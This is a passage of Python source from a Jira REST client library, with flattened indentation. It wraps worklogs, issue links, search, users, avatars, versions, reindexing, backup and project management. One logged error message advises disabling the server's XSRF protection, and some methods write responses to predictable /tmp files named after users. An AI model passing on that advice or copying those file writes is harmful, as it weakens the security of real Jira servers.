Add a new worklog entry on an issue and return a Resource for it.
:param issue: the issue to add the worklog to
:param timeSpent: a worklog entry with this amount of time spent, e.g. "2d"
:param adjustEstimate: (optional) allows the user to provide specific instructions to update the remaining\
time estimate of the issue. The value can either be ``new``, ``leave``, ``manual`` or ``auto`` (default).
:param newEstimate: the new value for the remaining estimate field. e.g. "2d"
:param reduceBy: the amount to reduce the remaining estimate by e.g. "2d"
:param started: Moment when the work is logged, if not specified will default to now
:param comment: optional worklog comment
"""
params = {}
if adjustEstimate is not None:
params['adjustEstimate'] = adjustEstimate
if newEstimate is not None:
params['newEstimate'] = newEstimate
if reduceBy is not None:
params['reduceBy'] = reduceBy
data = {}
if timeSpent is not None:
data['timeSpent'] = timeSpent
if timeSpentSeconds is not None:
data['timeSpentSeconds'] = timeSpentSeconds
if comment is not None:
data['comment'] = comment
elif user:
# we log user inside comment as it doesn't always work
data['comment'] = user
if started is not None:
# based on REST Browser it needs: "2014-06-03T08:21:01.273+0000"
data['started'] = started.strftime("%Y-%m-%dT%H:%M:%S.000%z")
if user is not None:
data['author'] = {"name": user,
'self': self.JIRA_BASE_URL + '/rest/api/2/user?username=' + user,
'displayName': user,
'active': False
}
data['updateAuthor'] = data['author']
# TODO: report bug to Atlassian: author and updateAuthor parameters are
# ignored.
url = self._get_url('issue/{0}/worklog'.format(issue))
r = self._session.post(url, params=params, data=json.dumps(data))
return Worklog(self._options, self._session, json_loads(r))
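    # Sketch with a hypothetical issue key and values:
    #
    #     jira.add_worklog('FOO-1', timeSpent='2h', comment='Investigated the failing build')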
# Issue links
@translate_resource_args
def create_issue_link(self, type, inwardIssue, outwardIssue, comment=None):
"""
Create a link between two issues.
:param type: the type of link to create
:param inwardIssue: the issue to link from
:param outwardIssue: the issue to link to
:param comment: a comment to add to the issues with the link. Should be a dict containing ``body``\
and ``visibility`` fields: ``body`` being the text of the comment and ``visibility`` being a dict containing\
two entries: ``type`` and ``value``. ``type`` is ``role`` (or ``group`` if the JIRA server has configured\
comment visibility for groups) and ``value`` is the name of the role (or group) to which viewing of this\
comment will be restricted.
"""
# let's see if we have the right issue link 'type' and fix it if needed
if not hasattr(self, '_cached_issuetypes'):
self._cached_issue_link_types = self.issue_link_types()
if type not in self._cached_issue_link_types:
for lt in self._cached_issue_link_types:
if lt.outward == type:
                    # try to figure out what was meant
type = lt.name
break
elif lt.inward == type:
# so that's the reverse, so we fix the request
type = lt.name
inwardIssue, outwardIssue = outwardIssue, inwardIssue
break
data = {
'type': {
'name': type
},
'inwardIssue': {
'key': inwardIssue
},
'outwardIssue': {
'key': outwardIssue
},
'comment': comment
}
url = self._get_url('issueLink')
r = self._session.post(
url, data=json.dumps(data))
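    # Sketch with a hypothetical link type name and issue keys:
    #
    #     jira.create_issue_link('Duplicate', 'FOO-1', 'FOO-2')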
def issue_link(self, id):
"""
Get an issue link Resource from the server.
:param id: ID of the issue link to get
"""
return self._find_for_resource(IssueLink, id)
# Issue link types
def issue_link_types(self):
"""Get a list of issue link type Resources from the server."""
r_json = self._get_json('issueLinkType')
link_types = [IssueLinkType(self._options, self._session, raw_link_json) for raw_link_json in
r_json['issueLinkTypes']]
return link_types
def issue_link_type(self, id):
"""
Get an issue link type Resource from the server.
:param id: ID of the issue link type to get
"""
return self._find_for_resource(IssueLinkType, id)
# Issue types
def issue_types(self):
"""Get a list of issue type Resources from the server."""
r_json = self._get_json('issuetype')
issue_types = [IssueType(
self._options, self._session, raw_type_json) for raw_type_json in r_json]
return issue_types
def issue_type(self, id):
"""
Get an issue type Resource from the server.
:param id: ID of the issue type to get
"""
return self._find_for_resource(IssueType, id)
# User permissions
# non-resource
def my_permissions(self, projectKey=None, projectId=None, issueKey=None, issueId=None):
"""
Get a dict of all available permissions on the server.
:param projectKey: limit returned permissions to the specified project
:param projectId: limit returned permissions to the specified project
:param issueKey: limit returned permissions to the specified issue
:param issueId: limit returned permissions to the specified issue
"""
params = {}
if projectKey is not None:
params['projectKey'] = projectKey
if projectId is not None:
params['projectId'] = projectId
if issueKey is not None:
params['issueKey'] = issueKey
if issueId is not None:
params['issueId'] = issueId
return self._get_json('mypermissions', params=params)
# Priorities
def priorities(self):
"""Get a list of priority Resources from the server."""
r_json = self._get_json('priority')
priorities = [Priority(
self._options, self._session, raw_priority_json) for raw_priority_json in r_json]
return priorities
def priority(self, id):
"""
Get a priority Resource from the server.
:param id: ID of the priority to get
"""
return self._find_for_resource(Priority, id)
# Projects
def projects(self):
"""Get a list of project Resources from the server visible to the current authenticated user."""
r_json = self._get_json('project')
projects = [Project(
self._options, self._session, raw_project_json) for raw_project_json in r_json]
return projects
def project(self, id):
"""
Get a project Resource from the server.
:param id: ID or key of the project to get
"""
return self._find_for_resource(Project, id)
# non-resource
@translate_resource_args
def project_avatars(self, project):
"""
Get a dict of all avatars for a project visible to the current authenticated user.
:param project: ID or key of the project to get avatars for
"""
return self._get_json('project/' + project + '/avatars')
@translate_resource_args
def create_temp_project_avatar(self, project, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a project avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on libmagic and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_project_avatar` to finish the avatar creation process. If\
you want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the 'auto_confirm'\
argument with a truthy value and :py:meth:`confirm_project_avatar` will be called for you before this method\
returns.
:param project: ID or key of the project to create the avatar in
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object holding the avatar
:param contentType: explicit specification for the avatar image's content-type
:param boolean auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_project_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('project/' + project + '/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_project_avatar(project, cropping_properties)
else:
return cropping_properties
@translate_resource_args
def confirm_project_avatar(self, project, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_project_avatar`, use this method to confirm the avatar
for use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_project_avatar` should be used for this
argument.
:param project: ID or key of the project to confirm the avatar in
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_project_avatar`
"""
data = cropping_properties
url = self._get_url('project/' + project + '/avatar')
r = self._session.post(
url, data=json.dumps(data))
return json_loads(r)
@translate_resource_args
def set_project_avatar(self, project, avatar):
"""
Set a project's avatar.
:param project: ID or key of the project to set the avatar on
:param avatar: ID of the avatar to set
"""
self._set_avatar(
None, self._get_url('project/' + project + '/avatar'), avatar)
@translate_resource_args
def delete_project_avatar(self, project, avatar):
"""
Delete a project's avatar.
:param project: ID or key of the project to delete the avatar from
:param avatar: ID of the avatar to delete
"""
url = self._get_url('project/' + project + '/avatar/' + avatar)
r = self._session.delete(url)
@translate_resource_args
def project_components(self, project):
"""
Get a list of component Resources present on a project.
:param project: ID or key of the project to get components from
"""
r_json = self._get_json('project/' + project + '/components')
components = [Component(
self._options, self._session, raw_comp_json) for raw_comp_json in r_json]
return components
@translate_resource_args
def project_versions(self, project):
"""
Get a list of version Resources present on a project.
:param project: ID or key of the project to get versions from
"""
r_json = self._get_json('project/' + project + '/versions')
versions = [
Version(self._options, self._session, raw_ver_json) for raw_ver_json in r_json]
return versions
# non-resource
@translate_resource_args
def project_roles(self, project):
"""
Get a dict of role names to resource locations for a project.
:param project: ID or key of the project to get roles from
"""
return self._get_json('project/' + project + '/role')
@translate_resource_args
def project_role(self, project, id):
"""
Get a role Resource.
:param project: ID or key of the project to get the role from
:param id: ID of the role to get
"""
return self._find_for_resource(Role, (project, id))
# Resolutions
def resolutions(self):
"""Get a list of resolution Resources from the server."""
r_json = self._get_json('resolution')
resolutions = [Resolution(
self._options, self._session, raw_res_json) for raw_res_json in r_json]
return resolutions
def resolution(self, id):
"""
Get a resolution Resource from the server.
:param id: ID of the resolution to get
"""
return self._find_for_resource(Resolution, id)
# Search
def search_issues(self, jql_str, startAt=0, maxResults=50, validate_query=True, fields=None, expand=None,
json_result=None):
"""
Get a ResultList of issue Resources matching a JQL search string.
:param jql_str: the JQL search string to use
:param startAt: index of the first issue to return
:param maxResults: maximum number of issues to return. Total number of results
is available in the ``total`` attribute of the returned ResultList.
If maxResults evaluates as False, it will try to get all issues in batches of 50.
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# TODO what to do about the expand, which isn't related to the issues?
infinite = False
maxi = 50
idx = 0
if fields is None:
fields = []
# If maxResults evaluates as False, fetch all issues from the query in batches
if not maxResults:
maxResults = maxi
infinite = True
search_params = {
"jql": jql_str,
"startAt": startAt,
"maxResults": maxResults,
"validateQuery": validate_query,
"fields": fields,
"expand": expand
}
if json_result:
return self._get_json('search', params=search_params)
resource = self._get_json('search', params=search_params)
issues = [Issue(self._options, self._session, raw_issue_json)
for raw_issue_json in resource['issues']]
cnt = len(issues)
total = resource['total']
if infinite:
while cnt == maxi:
idx += maxi
search_params["startAt"] = idx
resource = self._get_json('search', params=search_params)
issue_batch = [Issue(self._options, self._session, raw_issue_json) for raw_issue_json in
resource['issues']]
issues.extend(issue_batch)
cnt = len(issue_batch)
return ResultList(issues, total)
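# Illustrative sketch (not part of the library): assuming an authenticated
# client ``jira`` and a hypothetical project key ``DEMO``, a JQL search with
# explicit paging might look like this; the ``total`` attribute of the
# returned ResultList carries the server-side match count:
#
#   issues = jira.search_issues('project = DEMO AND status = Open',
#                               startAt=0, maxResults=100)
#   print(issues.total)
#   all_issues = jira.search_issues('project = DEMO', maxResults=False)
#
# Passing ``maxResults=False`` fetches every match in batches of 50, as
# implemented above.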
# Security levels
def security_level(self, id):
"""
Get a security level Resource.
:param id: ID of the security level to get
"""
return self._find_for_resource(SecurityLevel, id)
# Server info
# non-resource
def server_info(self):
"""Get a dict of server information for this JIRA instance."""
return self._get_json('serverInfo')
# Status
def statuses(self):
"""Get a list of status Resources from the server."""
r_json = self._get_json('status')
statuses = [Status(self._options, self._session, raw_stat_json)
for raw_stat_json in r_json]
return statuses
def status(self, id):
"""
Get a status Resource from the server.
:param id: ID of the status resource to get
"""
return self._find_for_resource(Status, id)
# Users
def user(self, id, expand=None):
"""
Get a user Resource from the server.
:param id: ID of the user to get
:param expand: extra information to fetch inside each resource
"""
user = User(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
user.find(id, params=params)
return user
def search_assignable_users_for_projects(self, username, projectKeys, startAt=0, maxResults=50):
"""
Get a list of user Resources that match the search string and can be assigned issues for projects.
:param username: a string to match usernames against
:param projectKeys: comma-separated list of project keys to check for issue assignment permissions
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'projectKeys': projectKeys,
'startAt': startAt,
'maxResults': maxResults
}
r_json = self._get_json(
'user/assignable/multiProjectSearch', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_assignable_users_for_issues(self, username, project=None, issueKey=None, expand=None, startAt=0,
maxResults=50):
"""
Get a list of user Resources that match the search string for assigning or creating issues.
This method is intended to find users that are eligible to create issues in a project or be assigned
to an existing issue. When searching for eligible creators, specify a project. When searching for eligible
assignees, specify an issue key.
:param username: a string to match usernames against
:param project: filter returned users by permission in this project (expected if a result will be used to \
create an issue)
:param issueKey: filter returned users by this issue (expected if a result will be used to edit this issue)
:param expand: extra information to fetch inside each resource
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'startAt': startAt,
'maxResults': maxResults,
}
if project is not None:
params['project'] = project
if issueKey is not None:
params['issueKey'] = issueKey
if expand is not None:
params['expand'] = expand
r_json = self._get_json('user/assignable/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
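# Illustrative sketch (not part of the library): assuming an authenticated
# client ``jira`` and a hypothetical issue key ``DEMO-1``, eligible
# assignees matching a username fragment could be listed with:
#
#   users = jira.search_assignable_users_for_issues('fred', issueKey='DEMO-1')
#   names = [u.name for u in users]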
# non-resource
def user_avatars(self, username):
"""
Get a dict of avatars for the specified user.
:param username: the username to get avatars for
"""
return self._get_json('user/avatars', params={'username': username})
def create_temp_user_avatar(self, user, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a user avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on ``libmagic`` and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_user_avatar` to finish the avatar creation process. If you
want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the ``auto_confirm``
argument with a truthy value and :py:meth:`confirm_user_avatar` will be called for you before this method
returns.
:param user: user to register the avatar for
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object containing the avatar
:param contentType: explicit specification for the avatar image's content-type
:param auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_user_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'username': user,
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('user/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_user_avatar(user, cropping_properties)
else:
return cropping_properties
def confirm_user_avatar(self, user, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_user_avatar`, use this method to confirm the avatar for
use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_user_avatar` should be used for this
argument.
:param user: the user to confirm the avatar for
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_user_avatar`
"""
data = cropping_properties
url = self._get_url('user/avatar')
r = self._session.post(url, params={'username': user},
data=json.dumps(data))
return json_loads(r)
def set_user_avatar(self, username, avatar):
"""
Set a user's avatar.
:param username: the user to set the avatar for
:param avatar: ID of the avatar to set
"""
self._set_avatar(
{'username': username}, self._get_url('user/avatar'), avatar)
def delete_user_avatar(self, username, avatar):
"""
Delete a user's avatar.
:param username: the user to delete the avatar from
:param avatar: ID of the avatar to remove
"""
params = {'username': username}
url = self._get_url('user/avatar/' + avatar)
r = self._session.delete(url, params=params)
def search_users(self, user, startAt=0, maxResults=50, includeActive=True, includeInactive=False):
"""
Get a list of user Resources that match the specified search string.
:param user: a string to match usernames, name or email against
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
'includeActive': includeActive,
'includeInactive': includeInactive
}
r_json = self._get_json('user/search', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_allowed_users_for_issue(self, user, issueKey=None, projectKey=None, startAt=0, maxResults=50):
"""
Get a list of user Resources that match a username string and have browse permission for the issue or
project.
:param user: a string to match usernames against
:param issueKey: find users with browse permission for this issue
:param projectKey: find users with browse permission for this project
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
}
if issueKey is not None:
params['issueKey'] = issueKey
if projectKey is not None:
params['projectKey'] = projectKey
r_json = self._get_json('user/viewissue/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# Versions
@translate_resource_args
def create_version(self, name, project, description=None, releaseDate=None, startDate=None, archived=False,
released=False):
"""
Create a version in a project and return a Resource for it.
:param name: name of the version to create
:param project: key of the project to create the version in
:param description: a description of the version
:param releaseDate: the release date assigned to the version
:param startDate: The start date for the version
"""
data = {
'name': name,
'project': project,
'archived': archived,
'released': released
}
if description is not None:
data['description'] = description
if releaseDate is not None:
data['releaseDate'] = releaseDate
if startDate is not None:
data['startDate'] = startDate
url = self._get_url('version')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
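# Illustrative sketch (not part of the library): assuming an authenticated
# client ``jira`` and a hypothetical project key ``'DEMO'``, a version with
# a description and release date could be created like this:
#
#   v = jira.create_version('1.2.0', 'DEMO',
#                           description='Maintenance release',
#                           releaseDate='2014-06-01')
#   print(v.id, v.name)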
def move_version(self, id, after=None, position=None):
"""
Move a version within a project's ordered version list and return a new version Resource for it. One,
but not both, of ``after`` and ``position`` must be specified.
:param id: ID of the version to move
:param after: the self attribute of a version to place the specified version after (that is, higher in the list)
:param position: the absolute position to move this version to: must be one of ``First``, ``Last``,\
``Earlier``, or ``Later``
"""
data = {}
if after is not None:
data['after'] = after
elif position is not None:
data['position'] = position
url = self._get_url('version/' + id + '/move')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
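# Illustrative sketch (not part of the library): assuming two existing
# version Resources ``v_new`` and ``v_old`` in the same project, ``v_new``
# could be placed directly after ``v_old`` (using its ``self`` attribute,
# as documented above) or moved to an absolute position:
#
#   jira.move_version(v_new.id, after=v_old.self)
#   jira.move_version(v_new.id, position='Last')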
def version(self, id, expand=None):
"""
Get a version Resource.
:param id: ID of the version to get
:param expand: extra information to fetch inside each resource
"""
version = Version(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
version.find(id, params=params)
return version
def version_count_related_issues(self, id):
"""
Get a dict of the counts of issues fixed and affected by a version.
:param id: the version to count issues for
"""
r_json = self._get_json('version/' + id + '/relatedIssueCounts')
del r_json['self'] # this isn't really an addressable resource
return r_json
def version_count_unresolved_issues(self, id):
"""
Get the number of unresolved issues for a version.
:param id: ID of the version to count issues for
"""
return self._get_json('version/' + id + '/unresolvedIssueCount')['issuesUnresolvedCount']
# Session authentication
def session(self):
"""Get a dict of the current authenticated user's session information."""
url = '{server}/rest/auth/1/session'.format(**self._options)
if type(self._session.auth) is tuple:
authentication_data = {
'username': self._session.auth[0], 'password': self._session.auth[1]}
r = self._session.post(url, data=json.dumps(authentication_data))
else:
r = self._session.get(url)
user = User(self._options, self._session, json_loads(r))
return user
def kill_session(self):
"""Destroy the session of the current authenticated user."""
url = self._options['server'] + '/rest/auth/latest/session'
r = self._session.delete(url)
# Websudo
def kill_websudo(self):
"""Destroy the user's current WebSudo session."""
url = self._options['server'] + '/rest/auth/1/websudo'
r = self._session.delete(url)
# Utilities
def _create_http_basic_session(self, username, password):
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = (username, password)
self._session.cert = self._options['client_cert']
def _create_oauth_session(self, oauth):
verify = self._options['verify']
from requests_oauthlib import OAuth1
from oauthlib.oauth1 import SIGNATURE_RSA
oauth = OAuth1(
oauth['consumer_key'],
rsa_key=oauth['key_cert'],
signature_method=SIGNATURE_RSA,
resource_owner_key=oauth['access_token'],
resource_owner_secret=oauth['access_token_secret']
)
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = oauth
def _set_avatar(self, params, url, avatar):
data = {
'id': avatar
}
r = self._session.put(url, params=params, data=json.dumps(data))
def _get_url(self, path, base=JIRA_BASE_URL):
options = self._options
options.update({'path': path})
return base.format(**options)
def _get_json(self, path, params=None, base=JIRA_BASE_URL):
url = self._get_url(path, base)
r = self._session.get(url, params=params)
try:
r_json = json_loads(r)
except ValueError as e:
logging.error("%s\n%s" % (e, r.text))
raise e
return r_json
def _find_for_resource(self, resource_cls, ids, expand=None):
resource = resource_cls(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
resource.find(id=ids, params=params)
return resource
def _try_magic(self):
try:
import magic
import weakref
except ImportError:
self._magic = None
else:
try:
_magic = magic.Magic(flags=magic.MAGIC_MIME_TYPE)
cleanup = lambda _: _magic.close()
self._magic_weakref = weakref.ref(self, cleanup)
self._magic = _magic
except TypeError:
self._magic = None
except AttributeError:
self._magic = None
def _get_mime_type(self, buff):
if self._magic is not None:
return self._magic.id_buffer(buff)
else:
try:
return mimetypes.guess_type("f." + imghdr.what(0, buff))[0]
except (IOError, TypeError):
logging.warning("Couldn't detect content type of avatar image"
". Specify the 'contentType' parameter explicitly.")
return None
def email_user(self, user, body, title="JIRA Notification"):
"""
TBD:
"""
url = self._options['server'] + \
'/secure/admin/groovy/CannedScriptRunner.jspa'
payload = {
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'cannedScriptArgs_FIELD_CONDITION': '',
'cannedScriptArgs_FIELD_EMAIL_TEMPLATE': body,
'cannedScriptArgs_FIELD_EMAIL_SUBJECT_TEMPLATE': title,
'cannedScriptArgs_FIELD_EMAIL_FORMAT': 'TEXT',
'cannedScriptArgs_FIELD_TO_ADDRESSES': self.user(user).emailAddress,
'cannedScriptArgs_FIELD_TO_USER_FIELDS': '',
'cannedScriptArgs_FIELD_INCLUDE_ATTACHMENTS': 'FIELD_INCLUDE_ATTACHMENTS_NONE',
'cannedScriptArgs_FIELD_FROM': '',
'cannedScriptArgs_FIELD_PREVIEW_ISSUE': '',
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'id': '',
'Preview': 'Preview',
}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
open("/tmp/jira_email_user_%s.html" % user, "w").write(r.text)
def rename_user(self, old_user, new_user):
"""
Rename a JIRA user. The current implementation relies on a third-party plugin, but in the future it may use embedded JIRA functionality.
:param old_user: string with username login
:param new_user: string with username login
"""
if self._version >= (6, 0, 0):
url = self._options['server'] + '/rest/api/2/user'
payload = {
"name": new_user,
}
params = {
'username': old_user
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.put(url, params=params,
data=json.dumps(payload))
else:
# the old implementation needed the ScriptRunner plugin
merge = "true"
try:
self.user(new_user)
except:
merge = "false"
url = self._options[
'server'] + '/secure/admin/groovy/CannedScriptRunner.jspa#result'
payload = {
"cannedScript": "com.onresolve.jira.groovy.canned.admin.RenameUser",
"cannedScriptArgs_FIELD_FROM_USER_ID": old_user,
"cannedScriptArgs_FIELD_TO_USER_ID": new_user,
"cannedScriptArgs_FIELD_MERGE": merge,
"id": "",
"RunCanned": "Run",
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 404:
logging.error(
"In order to be able to use rename_user() you need to install Script Runner plugin. See https://marketplace.atlassian.com/plugins/com.onresolve.jira.groovy.groovyrunner")
return False
if r.status_code != 200:
logging.error(r.status_code)
if re.compile("XSRF Security Token Missing").search(r.content):
logging.fatal(
"Reconfigure JIRA and disable XSRF in order to be able call this. See https://developer.atlassian.com/display/JIRADEV/Form+Token+Handling")
return False
open("/tmp/jira_rename_user_%s_to%s.html" %
(old_user, new_user), "w").write(r.content)
msg = r.status_code
m = re.search("<span class=\"errMsg\">(.*)<\/span>", r.content)
if m:
msg = m.group(1)
logging.error(msg)
return False
# <span class="errMsg">Target user ID must exist already for a merge</span>
p = re.compile("type=\"hidden\" name=\"cannedScriptArgs_Hidden_output\" value=\"(.*?)\"\/>",
re.MULTILINE | re.DOTALL)
m = p.search(r.content)
if m:
h = html_parser.HTMLParser()
msg = h.unescape(m.group(1))
logging.info(msg)
# let's check if the user still exists
try:
self.user(old_user)
except:
logging.error("User %s does not exists." % old_user)
return msg
logging.error(msg)
logging.error(
"User %s does still exists after rename, that's clearly a problem." % old_user)
return False
def delete_user(self, username):
url = self._options['server'] + \
'/rest/api/latest/user/?username=%s' % username
r = self._session.delete(url)
if 200 <= r.status_code <= 299:
return True
else:
logging.error(r.status_code)
return False
def reindex(self, force=False, background=True):
"""
Start JIRA re-indexing. Returns True if reindexing is in progress or not needed, or False.
If you call reindex() without any parameters, it will perform a background reindex only if JIRA thinks it should do it.
:param force: reindex even if JIRA doesn't say this is needed, False by default.
:param background: reindex in the background, slower but does not impact the users, defaults to True.
"""
# /secure/admin/IndexAdmin.jspa
# /secure/admin/jira/IndexProgress.jspa?taskId=1
if background:
indexingStrategy = 'background'
else:
indexingStrategy = 'stoptheworld'
url = self._options['server'] + '/secure/admin/jira/IndexReIndex.jspa'
r = self._session.get(url, headers=self._options['headers'])
if r.status_code == 503:
# logging.warning("JIRA returned 503, this could mean that a full reindex is in progress.")
return 503
if not r.text.find("To perform the re-index now, please go to the") and force is False:
return True
if r.text.find('All issues are being re-indexed'):
logging.warning("JIRA re-indexing is already running.")
return True # still reindexing is considered still a success
if r.text.find('To perform the re-index now, please go to the') or force:
r = self._session.post(url, headers=self._options['headers'],
params={"indexingStrategy": indexingStrategy, "reindex": "Re-Index"})
if r.text.find('All issues are being re-indexed') != -1:
return True
else:
logging.error("Failed to reindex jira, probably a bug.")
return False
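# Illustrative sketch (not part of the library): assuming an authenticated
# client ``jira`` with administrative rights, a forced background reindex
# would be requested as follows (the return value may also be 503 when a
# full reindex is already in progress, as handled above):
#
#   ok = jira.reindex(force=True, background=True)
#   if ok is not True:
#       logging.warning("reindex not confirmed: %s", ok)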
def backup(self, filename='backup.zip'):
"""
Will call the JIRA export to back up as zipped XML. Returning with success does not mean that the backup process has finished.
"""
url = self._options['server'] + '/secure/admin/XmlBackup.jspa'
payload = {'filename': filename}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 200:
return True
else:
logging.warning(
'Got %s response from calling backup.' % r.status_code)
return r.status_code
def current_user(self):
if not hasattr(self, '_serverInfo') or 'username' not in self._serverInfo:
url = self._get_url('serverInfo')
r = self._session.get(url, headers=self._options['headers'])
r_json = json_loads(r)
if 'x-ausername' in r.headers:
r_json['username'] = r.headers['x-ausername']
else:
r_json['username'] = None
self._serverInfo = r_json
# del r_json['self'] # this isn't really an addressable resource
return self._serverInfo['username']
def delete_project(self, pid):
"""
Delete a project. ``pid`` can be a project id, project key or project name. It will return False if it fails.
"""
found = False
try:
if str(int(pid)) == str(pid):  # pid is already a numeric project id
found = True
except Exception as e:
r_json = self._get_json('project')
for e in r_json:
if e['key'] == pid or e['name'] == pid:
pid = e['id']
found = True
break
if not found:
logging.error("Unable to recognize project `%s`" % pid)
return False
url = self._options['server'] + '/secure/admin/DeleteProject.jspa'
payload = {'pid': pid, 'Delete': 'Delete', 'confirm': 'true'}
r = self._session.post(
url, headers=CaseInsensitiveDict({'content-type': 'application/x-www-form-urlencoded'}), data=payload)
if r.status_code == 200:
return self._check_for_html_error(r.text)
else:
logging.warning(
'Got %s response from calling delete_project.' % r.status_code)
return r.status_code
def create_project(self, key, name=None, assignee=None):
"""
Key is mandatory and has to match JIRA project key requirements, usually only 2-10 uppercase characters.
If name is not specified it will use the key value.
If assignee is not specified it will use current user.
The returned value should evaluate to False if it fails otherwise it will be the new project id.
"""
if assignee is None:
assignee = self.current_user()
if name is None:
name = key
if key.upper() != key or not key.isalpha() or len(key) < 2 or len(key) > 10:
logging.error(
'key parameter is not all-uppercase alphabetic of length between 2 and 10')
return False
url = self._options['server'] + \
'/rest/project-templates/1.0/templates'
r = self._session.get(url)
j = json_loads(r)
template_key = None
templates = []
for template in j['projectTemplates']:
templates.append(template['name'])
if template['name'] in ['JIRA Classic', 'JIRA Default Schemes']:
template_key = template['projectTemplateModuleCompleteKey']
break
if not template_key:
raise JIRAError(
"Unable to find a suitable project template to use. Found only: " + ', '.join(templates))
payload = {'name': name,
'key': key,
'keyEdited': 'false',
#'projectTemplate': 'com.atlassian.jira-core-project-templates:jira-issuetracking',
#'permissionScheme': '',
'projectTemplateWebItemKey': template_key,
'projectTemplateModuleKey': template_key,
'lead': assignee,
#'assigneeType': '2',
}
headers = CaseInsensitiveDict(
{'Content-Type': 'application/x-www-form-urlencoded'})
r = self._session.post(url, data=payload, headers=headers)
if r.status_code == 200:
r_json = json_loads(r)
return r_json
f = tempfile.NamedTemporaryFile(
suffix='.html', prefix='python-jira-error-create-project-', delete=False)
f.write(r.text)
if self.logging:
logging.error(
"Unexpected result while running create project. Server response saved in %s for further investigation [HTTP response=%s]." % (
f.name, r.status_code))
return False
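# Illustrative sketch (not part of the library): assuming an authenticated
# client ``jira`` with project-creation rights, a project with a
# hypothetical key could be created and later removed again:
#
#   result = jira.create_project('SANDBX', name='Sandbox')
#   if result:
#       jira.delete_project('SANDBX')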
def add_user(self, username, email, directoryId=1, password=None, fullname=None, sendEmail=False, active=True):
fullname = fullname or username  # honor an explicit fullname, default to username
# TODO: default the directoryID to the first directory in jira instead
# of 1 which is the internal one.
url = self._options['server'] + '/rest/api/latest/user'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['displayName'] = fullname
x['emailAddress'] = email
x['name'] = username
if password:
x['password'] = password
payload = json.dumps(x)
